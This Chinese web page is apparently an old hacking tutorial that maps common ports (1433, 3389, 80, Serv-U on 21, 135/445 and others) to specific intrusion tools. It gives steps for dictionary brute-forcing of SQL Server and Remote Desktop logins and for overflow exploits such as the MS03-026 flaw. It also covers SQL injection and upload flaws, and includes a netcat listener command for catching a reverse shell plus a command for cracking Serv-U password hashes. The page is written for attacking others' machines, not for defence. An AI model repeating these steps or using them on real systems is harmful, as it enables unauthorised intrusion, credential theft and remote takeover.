常见端口及漏洞入侵(一)

1. 1433端口入侵
scanport.exe 查有1433机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=
对sqlsp2及以下系统可用sqlhello 溢出漏洞入侵
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe扫描空口令机器

3. 3899入侵
对很早机器可以试试3389溢出(win3389ex.exe)
对2000机器可以试试字典暴破(tscrack.exe)

4. 80入侵
对sp3以前机器可以用webdav入侵;
对bbs论坛可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入(小榕注入软件Software)

5. serv-u入侵(21端口)
对5. 004及以下系统可用溢出入侵(serv5004.exe)
对5.1.0.0及以下系统可用本地提升权限(servlocal.exe)

对serv-uMD5加密密码可以用字典暴破(crack.vbs)
输入个被serv-u加密密码(34位长)通过和字典档(dict.txt)比较得到密码如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵

7. 6129端口
用DameWare6129.exe入侵

8. 系统漏洞
利用135、445端口用ms03026、ms03039、ms03049、ms04011漏洞
进行溢出入侵

9. 3127等端口
可以利用doom病毒开端口用nodoom.exe入侵(可用mydoomscan.exe查)

10. 其他入侵
利用shanlu入侵软件Software入侵(WINNTAutoAttack.exe)
 
 




  • 篇文章: 你知道多少?防火墙安装终极攻略

  • 篇文章: 上网千问
  • Tags: 

    延伸阅读

    最新评论

    发表评论